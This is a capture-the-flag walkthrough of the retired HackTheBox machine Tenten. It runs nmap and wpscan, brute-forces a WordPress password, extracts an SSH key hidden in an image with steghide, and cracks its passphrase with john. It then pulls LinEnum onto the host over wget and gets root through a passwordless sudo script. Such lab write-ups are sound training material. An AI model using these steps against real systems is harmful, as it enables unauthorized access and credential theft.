This walkthrough is for the HacktheBox retired machine named Tenten.
We pick Tenten from the list:
We do a usual
nmap -sS -T4 -A -p- 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-26 20:51 EDT Nmap scan report for 10.10.10.10 Host is up (0.26s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA) | 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA) |_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.7.3 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Job Portal – Just another WordPress site Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: HP P2000 G3 NAS device (94%), Android 4.1.1 (91%), Android 4.1.2 (91%), Linux 3.10 - 4.11 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Android 4.2.2 (Linux 3.4) (91%), DD-WRT v3.0 (Linux 4.4.2) (91%), Linux 4.1 (91%), Linux 4.4 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 413.26 ms 10.10.14.1 2 413.43 ms 10.10.10.10 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 584.34 seconds
While it was scanning I did try out the default port
80 on the browser:
http://10.10.10.10 and can see right away we get a WordPress site:
From looking around, we just have the default theme, post, and comment on it.
But the Job Listing is a menu link. Let’s explore it but first run
wpscan against it:
wpscan -e u --url http://10.10.10.10
We want to enumerate user IDs using the
-e u switch and see if we can find any as well as any vulnerabilities, versions, and open files.
This however, can be done manually by adding:
/wp-json/wp/v2/users/ to the end of the site.
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.6.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://10.10.10.10/ [+] Started: Thu Sep 26 20:58:52 2019 Interesting Finding(s): [+] http://10.10.10.10/ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://10.10.10.10/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.10.10/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://10.10.10.10/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06). | Detected By: Rss Generator (Passive Detection) | - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator> | - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator> | | [!] 35 vulnerabilities identified: | ... [+] WordPress theme in use: twentyseventeen | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/ | Last Updated: 2019-05-07T00:00:00.000Z | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.2 | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Detected By: Css Style (Passive Detection) | | Version: 1.1 (80% confidence) | Detected By: Style (Passive Detection) | - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <=====================================================================> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] takis | Detected By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Finished: Thu Sep 26 20:59:05 2019 [+] Requests Done: 70 [+] Cached Requests: 7 [+] Data Sent: 14.062 KB [+] Data Received: 24.943 MB [+] Memory used: 111.887 MB [+] Elapsed time: 00:00:12
We have a user:
We then run a password attack scan on it:
wpscan -U takis -P /usr/share/wordlists/rockyou.txt --url http://10.10.10.10
While that runs let’s look at the Job Listings link:
Looks like we can upload a file:
We could test upload an image and see if we can find it.
I right-clicked and saved the banner image as
banner.jpg to use as the CV file.
After doing some reading it looks like the Job Manager when uploading resumes creates a new private page. When we first submitted the post, we may have noticed the
/apply/8/ so because the Hello World one is post 1 and this one is post 8 let’s see what the in between and after ones are.
As you can see we’re getting the drafts and unpublished posts. So it must be open somewhere.
Generally, the file upload path of WordPress is
So we try it (replacing the month and year to current values):
And it works.
I attempted to upload with a reverse shell php file by spoofing it as a jpg or csv but was not successful.
Back to enumerating the private posts we see post 13 has an interesting message:
Given that they made one for Title: banner for the
banner.jpg I uploaded, I am going to try to see if this is a photo. From the Archive page, it looks like it was made in April 2017.
This might be one of those where the message is unrealistically hidden in the image.
So we download it:
I couldn’t see much using
stegsolve so I try
apt install -y libjpeg-dev libmcrypt-dev libmhash-dev
apt install -y steghide
Check against the file, I took a guess and left the passphrase blank:
steghide extract -sf HackerAccessGranted.jpg Enter passphrase: <empty> wrote extracted data to "id_rsa".
Looks like an
We get a private key, which is still encrypted.
If we try to
ssh as the user with this key it won’t work because it is still encrypted.
Let’s attempt to decrypt it with
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash && /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
We get the password:
We then attempt to login with it using the
-i switch to identity the file path:
ssh -i id_rsa email@example.com
Then start with getting the user flag.
As a bit of a detour I checked out the WordPress config file to see if the root user shared any of the config password file.
I didn’t really get anywhere from there.
Eventually, since we have the shell open we start a simple web server and move over our enumerate shell file.
On our local Kali machine:
python -m SimpleHTTPServer 9999
We can use
wget -O enum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Then back on our reverse shell:
cd /tmp/ && wget http://10.10.XXX.XXX:9999/enum.sh
After it runs, it indicates that we have a
sudo privileged script that can be run without a password:
[+] We can sudo without supplying a password! Matching Defaults entries for takis on tenten: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User takis may run the following commands on tenten: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/fuckin
We check the file:
#!/bin/bash $1 $2 $3 $4
So it takes up to four arguments and uses bash. We could use it to spawn a bash shell:
sudo /bin/fuckin /bin/bash
Alright, it worked.
id uid=0(root) gid=0(root) groups=0(root)
We then get to the root flag:
Success 😎 .